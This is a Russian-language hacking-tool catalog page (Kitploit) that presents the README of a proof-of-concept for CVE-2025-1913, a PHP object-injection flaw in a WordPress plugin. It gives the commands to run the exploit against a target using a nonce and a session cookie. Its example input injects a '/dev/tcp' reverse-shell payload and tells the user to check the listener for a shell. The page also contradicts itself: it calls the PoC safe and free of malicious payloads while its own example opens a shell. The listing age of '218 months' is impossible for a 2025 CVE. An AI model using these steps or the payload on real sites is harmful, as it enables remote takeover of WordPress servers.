Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1913-PoC — PoC, демонстрирующий CVE-2025-1913 и показывающий, как небезопасная обработка unserialize в плагине может приводить к поведению с высоким уровнем воздействия в контролируемых средах. Содержит вредоносную нагрузку только для авторизованного тестирования. Используйте строго в изолированных лабораториях и для оборонительных исследований. | Kitploit
Инструменты/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

Репозиторий
218 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

PoC, демонстрирующий CVE-2025-1913 и показывающий, как небезопасная обработка unserialize в плагине может приводить к поведению с высоким уровнем воздействия в контролируемых средах. Содержит вредоносную нагрузку только для авторизованного тестирования. Используйте строго в изолированных лабораториях и для оборонительных исследований.

Поделиться

CVE-2025-1913 -- Доказательство концепции (PoC)

Этот репозиторий содержит только для обучения доказательство концепции (PoC) для CVE-2025-1913, созданное Suhaib518 🇸🇦. Это PoC демонстрирует, как специально созданный сериализованный PHP-ввод может вызвать уязвимую логику в затронутых компонентах WordPress. PoC безопасен и не содержит вредоносных нагрузок.

⚠️ Отказ от ответственности: Это PoC предназначено только для обучения, исследований и тестирования защитных мер безопасности. НЕ используйте его на серверах, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.


📌 Обзор

Уязвимость существует из-за небезопасной обработки сериализованных PHP-данных в некоторых рабочих процессах плагинов WordPress. Это PoC показывает, как злоумышленник может предоставить специально созданные сериализованные структуры, которые вызывают непреднамеренное внутреннее поведение.

Этот репозиторий включает скрипт на Python, который:

  • Создает пользовательские сериализованные PHP-объекты
  • Кодирует их для экспортных конечных точек на основе AJAX WordPress
  • Отправляет контролируемый запрос для безопасной демонстрации проблемы

📂 Файлы в этом репозитории

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # Скрипт PoC, созданный Suhaib518 KSA
└── README.md                    # Документация

🚀 Использование

1. Установка зависимостей

Скрипт использует только встроенные модули Python, за исключением requests:

root@kitploit:~
pip install requests

2. Запуск интерактивного скрипта эксплойта

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

Вас спросят:

  • Сколько свойств включить
  • Имя/значение для каждого свойства

Затем скрипт сериализует их, сформирует запрос к WordPress и отправит его.


✔️ Пример команды (успешный поток эксплуатации)

Ниже приведен пример команды, демонстрирующей использование с примерами значений (они не являются вредоносными, только показывают процесс):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

Примеры ответов на интерактивные вопросы:

root@kitploit:~
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

После чего скрипт выведет:

root@kitploit:~
[*] Sending request…
....Check the listener for the shell.

🛡️ Меры смягчения (высокоуровневые)

  • Избегайте использования unserialize() на ненадежных входных данных
  • Проверяйте все параметры форм и AJAX-запросы
  • Обновляйте плагины
  • Используйте современные форматы данных, такие как JSON, вместо сериализации PHP

📜 Лицензия

Лицензия MIT.


🙌 Автор

Создано Suhaib518 🇸🇦.

Скачать инструмент